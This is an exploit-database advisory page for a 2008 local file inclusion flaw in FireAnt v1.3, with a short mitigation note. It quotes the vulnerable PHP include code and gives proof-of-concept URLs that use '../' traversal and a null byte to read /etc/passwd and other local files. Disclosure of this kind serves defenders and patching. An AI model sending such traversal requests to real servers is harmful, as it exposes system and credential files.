header-logo
Suggest Exploit
vendor:
FireAnt
by:
cOndemned
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: FireAnt
Affected Version From: FireAnt v1.3
Affected Version To: FireAnt v1.3
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

FireAnt v1.3 Local File Inclusion Vulnerability

FireAnt v1.3 is vulnerable to a local file inclusion vulnerability. This vulnerability is caused due to the 'page' parameter in 'index.php' not properly sanitized before being used to include files. This can be exploited to include arbitrary local files from the web server and execute arbitrary PHP code. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request containing directory traversal characters (e.g. '../') to include arbitrary local files from the web server.

Mitigation:

Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered for malicious characters.
Source

Exploit-DB raw data:

###################################################################################
#
#   Name   : FireAnt v1.3 Local File Inclusion Vulnerability
#   Author : cOndemned
#   Dork   : use Your brain (:
#   Greetz : ZaBeaTy, str0ke, GregStar, irk4z, Sandtalker & Avantura ;**
#
###################################################################################

Source :

    // index.php

    8.      $page = "bug_list"; //default page
    9.      if (!empty($_GET['page'])) {
    10.         $page = strip_tags($_GET['page']);
    
    99.             if (file_exists("./".$page.".php")) { 
    
    104.                include("./".$page.".php"); 

    
Proof of Concept :

    http://[host]/[FireAnt1.3]/index.php?page=../../../../etc/passwd%00
    http://[host]/[FireAnt1.3]/index.php?page=../../../../[local_file]%00

# milw0rm.com [2008-06-20]